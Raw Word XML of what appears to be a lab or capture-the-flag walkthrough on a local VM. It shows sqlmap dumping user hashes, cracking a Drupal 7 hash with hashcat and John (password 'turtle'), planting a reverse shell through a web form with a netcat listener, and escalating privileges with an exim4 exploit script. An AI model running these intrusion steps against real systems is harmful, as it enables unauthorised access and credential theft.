      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00491C7D">
        <w:t xml:space="preserve"> the data</w:t>
      </w:r>
      <w:r w:rsidR="00923BB7">
        <w:t>, the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘-C’ refers to the column ‘name’</w:t>
      </w:r>
      <w:r w:rsidR="00491C7D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>the ‘-T’ refers to the table</w:t>
      </w:r>
      <w:r w:rsidR="00FE7722">
        <w:t xml:space="preserve"> known as users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F476F3" w14:textId="6E65BD43" w:rsidR="00443457" w:rsidRDefault="00086F8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="501AAA53" wp14:editId="4AD82E3C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2933065" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21234"/>
                <wp:lineTo x="21464" y="21234"/>
                <wp:lineTo x="2146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117">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18BA1DC0" wp14:editId="10C6AE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013" cy="547360"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21073"/>
                <wp:lineTo x="20544" y="21073"/>
                <wp:lineTo x="205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3" cy="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C1A7B" w14:textId="53509BE0" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="5678CD3F" w14:textId="16945ED5" w:rsidR="00443457" w:rsidRDefault="00921B5F">
      <w:r>
        <w:t>Now we have the usernames and the hashed passwords of admin and john.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF6D49" w14:textId="77A15DAC" w:rsidR="00443457" w:rsidRDefault="00D97374" w:rsidP="00232BEA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc144148380"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cracking with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="476B7EAC" w14:textId="75045419" w:rsidR="00D97374" w:rsidRDefault="0063434E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0223C8C7" wp14:editId="40BE90F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52730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19538"/>
                <wp:lineTo x="21538" y="19538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21A">
        <w:t xml:space="preserve">The 7900 value refers to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC521A">
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC521A">
        <w:t xml:space="preserve"> 7 hash.</w:t>
      </w:r>
      <w:r w:rsidR="00862AD1">
        <w:t xml:space="preserve"> I got this information from a website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B29E2" w14:textId="72F256F8" w:rsidR="006A5497" w:rsidRDefault="00D4481B">
      <w:r>
        <w:t>This will take some time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FF691F" w14:textId="0ED14D5B" w:rsidR="007A3831" w:rsidRDefault="00C94F8C" w:rsidP="0061550A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc144148381"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75973984" wp14:editId="11B20B85">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>319723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="18954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491" y="19938"/>
                <wp:lineTo x="2149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831">
        <w:t>Cracking with John</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="77220D41" w14:textId="56A83A4C" w:rsidR="006A5497" w:rsidRDefault="006A5497"/>
    <w:p w14:paraId="2F4B6A48" w14:textId="6592C488" w:rsidR="006A5497" w:rsidRDefault="00E50A97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B32B5E2" wp14:editId="4A8A958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557588" cy="461947"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20501"/>
                <wp:lineTo x="21515" y="20501"/>
                <wp:lineTo x="2151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588" cy="46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8D">
        <w:t xml:space="preserve">This took a lot less time, it found the password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B6648D">
        <w:t>pretty quickly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B6648D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0085109A">
        <w:t xml:space="preserve"> The password is turtle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C0C8C3" w14:textId="52CE6957" w:rsidR="00150E94" w:rsidRDefault="00150E94"/>
    <w:p w14:paraId="53AC0E23" w14:textId="5263F4BE" w:rsidR="00407DED" w:rsidRDefault="00407DED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C2B3701" wp14:editId="44060642">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>120332</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="15430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33" y="20800"/>
                <wp:lineTo x="213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D1B22" w14:textId="4C2ABAA2" w:rsidR="00150E94" w:rsidRDefault="00150E94"/>
    <w:p w14:paraId="1E46C1C1" w14:textId="29E15AB0" w:rsidR="000E44DB" w:rsidRDefault="00CC08E1">
      <w:r>
        <w:t>Since that getting root is not that simple, I could probably safely assume that this password belongs to john.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16A643" w14:textId="6F67F1E4" w:rsidR="004C5630" w:rsidRDefault="004C5630" w:rsidP="00BD5298">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc144148382"/>
      <w:r>
        <w:t>Reverse Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="01B7B6B0" w14:textId="57D33F0F" w:rsidR="00930D28" w:rsidRDefault="001E3693">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79BE92C7" wp14:editId="5E27141D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052195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118" y="21333"/>
                <wp:lineTo x="2111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A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D104DE9" wp14:editId="42B29C66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671320" cy="243840"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20250"/>
                <wp:lineTo x="21419" y="20250"/>
                <wp:lineTo x="2141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28">
        <w:t xml:space="preserve">Now if we try the credentials </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00930D28">
        <w:t>john:turtle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007C6564">
        <w:t xml:space="preserve"> we will have web-portal access</w:t>
      </w:r>
      <w:r w:rsidR="00555981">
        <w:t>, through the url: 192.168.56.102/login/user</w:t>
      </w:r>
      <w:r w:rsidR="00544FF8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BA783" w14:textId="346D1534" w:rsidR="00CE51D0" w:rsidRDefault="00CE51D0"/>
    <w:p w14:paraId="5179AA94" w14:textId="4391D48B" w:rsidR="00CE51D0" w:rsidRDefault="00CE51D0"/>
    <w:p w14:paraId="4C93BE19" w14:textId="56DFC9BA" w:rsidR="00CE51D0" w:rsidRDefault="007C5082">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53F912DC" wp14:editId="624AD8C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731510" cy="1383030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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EB7B" w14:textId="7192129E" w:rsidR="0061550A" w:rsidRDefault="007C5082">
      <w:r>
        <w:t xml:space="preserve">Now that we can modify the form </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>settings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can input our reverse shell python code in here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14F4C9" w14:textId="67BFFA0D" w:rsidR="0061550A" w:rsidRDefault="00720325">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DB42FDD" wp14:editId="12797074">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>630811</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>371352</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4824484" cy="1181266"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21252"/>
                <wp:lineTo x="21495" y="21252"/>
                <wp:lineTo x="21495" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7995786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7860" name="Picture 1" descr="A computer screen shot of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84" cy="118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FE6">
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7FE6">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7FE6">
        <w:t xml:space="preserve"> running in the background on port 1234, we can modify the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7FE6">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7FE6">
        <w:t xml:space="preserve"> script to connect to the kali IP (which is 192.168.56.101) and listen to the same port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506352AD" w14:textId="63A5B93B" w:rsidR="00687FD0" w:rsidRPr="00CE51D0" w:rsidRDefault="00687FD0"/>
    <w:p w14:paraId="32F45128" w14:textId="77777777" w:rsidR="00CE46C6" w:rsidRDefault="00CE46C6"/>
    <w:p w14:paraId="010F08CE" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="542944F2" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="083FB24A" w14:textId="78668EEE" w:rsidR="00C0561A" w:rsidRDefault="00720325">
      <w:r>
        <w:t>Now we are in</w:t>
      </w:r>
      <w:r w:rsidR="00264638">
        <w:t>, we can begin exploring the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCBF2BB" w14:textId="7D1BB936" w:rsidR="001E6212" w:rsidRDefault="002F58E0" w:rsidP="00512ADA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc144148383"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Upgrading Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1A3233EA" w14:textId="49001943" w:rsidR="0005051B" w:rsidRDefault="00237A78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23D604A5" wp14:editId="6EF63EF7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1839</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4304762" cy="514286"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20826"/>
                <wp:lineTo x="21508" y="20826"/>
                <wp:lineTo x="21508" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="24045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67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D41DC" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="3837991D" w14:textId="6C1ECBA7" w:rsidR="00C0561A" w:rsidRDefault="00237A78">
      <w:r>
        <w:t xml:space="preserve">We can use python module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to upgrade to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a more nicer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993788D" w14:textId="48BF4B2E" w:rsidR="00F30580" w:rsidRDefault="00C04B12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DB40737" wp14:editId="6E2D90C6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3676190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380" y="19696"/>
                <wp:lineTo x="21380" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="116101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1431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FF24D" w14:textId="37A4FDAC" w:rsidR="00C0561A" w:rsidRDefault="008E3376">
      <w:r>
        <w:t>Now we have a better shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE4AB8" w14:textId="4F6B1ACC" w:rsidR="00C740A9" w:rsidRDefault="00C740A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AEFEB0F" wp14:editId="1EF7C387">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3061</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1600000" cy="266667"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20105"/>
                <wp:lineTo x="21351" y="20105"/>
                <wp:lineTo x="21351" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="60738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834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13C98" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="2DF5FA0C" w14:textId="37BFFF39" w:rsidR="00AE13CB" w:rsidRDefault="00AE13CB" w:rsidP="0087222F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc144148384"/>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="34C333A7" w14:textId="1B0ABE25" w:rsidR="00AE13CB" w:rsidRDefault="00FC2B54">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="280B9275" wp14:editId="062D4106">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>280897</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2353945" cy="1204595"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21179"/>
                <wp:lineTo x="21501" y="21179"/>
                <wp:lineTo x="21501" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="812628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8861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129">
        <w:t xml:space="preserve">Running the find command to find any binaries that we can exploit reveals an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B3129">
        <w:t>unsual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B3129">
        <w:t xml:space="preserve"> binary called exim4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874E014" w14:textId="7BEBAAF7" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="54DB5001" w14:textId="5CA7D587" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="2411D495" w14:textId="3193298A" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="1C1A18FC" w14:textId="6129CA76" w:rsidR="00C0561A" w:rsidRDefault="00FC2B54">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="535989CA" wp14:editId="226F804E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>459398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1125220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21210"/>
                <wp:lineTo x="21538" y="21210"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="14145509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0988" name="Picture 1" descr="A screenshot of a pho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CC9D0" w14:textId="6AC35B9E" w:rsidR="00C0561A" w:rsidRDefault="005E5BAF">
      <w:r>
        <w:t>Once I ran the command ‘exim4 –version’ I was able to see that there was an available exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E5E549" w14:textId="77777777" w:rsidR="00D45FD4" w:rsidRDefault="00D45FD4"/>
    <w:p w14:paraId="0CE61B86" w14:textId="1B1C960F" w:rsidR="00C0561A" w:rsidRDefault="00D45FD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0ADD6DD7" wp14:editId="37592AC3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514350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20800"/>
                <wp:lineTo x="21538" y="20800"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="174236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328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art a python server on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>desktop, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> download the file.</w:t>
      </w:r>
      <w:r w:rsidR="00126AFD">
        <w:t xml:space="preserve"> Configure the file at the bottom to use port 4444 and your kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00126AFD">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00126AFD">
        <w:t xml:space="preserve"> machine IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C7CFD" w14:textId="0C6EA043" w:rsidR="00C0561A" w:rsidRDefault="005B57A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53A090A3" wp14:editId="0B06E5C3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>186586</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2161905" cy="485714"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20356"/>
                <wp:lineTo x="21321" y="20356"/>
                <wp:lineTo x="21321" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="368078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78441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3DB">
        <w:t xml:space="preserve">Next, we run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007753DB">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007753DB">
        <w:t xml:space="preserve"> command and listen for port 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B37A3" w14:textId="08219C1C" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="2AF758B9" w14:textId="31CAFD17" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="046EB9F3" w14:textId="69319061" w:rsidR="00C0561A" w:rsidRDefault="00F7102C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="156DC609" wp14:editId="6726B5E7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>209399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3152381" cy="523810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20447"/>
                <wp:lineTo x="21409" y="20447"/>
                <wp:lineTo x="21409" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="8078360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6035" name="Picture 1" descr="A black background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BBA">
        <w:t xml:space="preserve">We can then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00123BBA">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00123BBA">
        <w:t xml:space="preserve"> the bash script with 777.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5259F4D1" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="096B01EF" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="59C7B2A3" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="7C1FE05C" w14:textId="675EC6B9" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"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269FBF7" wp14:editId="3B56B08F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-47966</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3561715" cy="2203450"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21476"/>
                <wp:lineTo x="21488" y="21476"/>
                <wp:lineTo x="21488" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="8645313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31389" name="Picture 1" descr="A screenshot of a computer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69A1D" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="5E4B4466" w14:textId="5F3DF7F8" w:rsidR="001F4223" w:rsidRDefault="001F4223"/>
    <w:p w14:paraId="5E1AEE27" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="4E7FD804" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="1C02011E" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="371E7024" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="72FCBD2C" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="2051BD9B" w14:textId="18A81B8F" w:rsidR="0054210F" w:rsidRDefault="0054210F">
      <w:r>
        <w:t xml:space="preserve">Next, run the script with ‘./upgrade.sh -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’.</w:t>
      </w:r>
      <w:r w:rsidR="000735CE">
        <w:t xml:space="preserve"> After this you should see ‘waiting 5 seconds</w:t>
      </w:r>
      <w:r w:rsidR="009A1DC2">
        <w:t>’, once the localhost appears you will type in the command ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A1DC2">
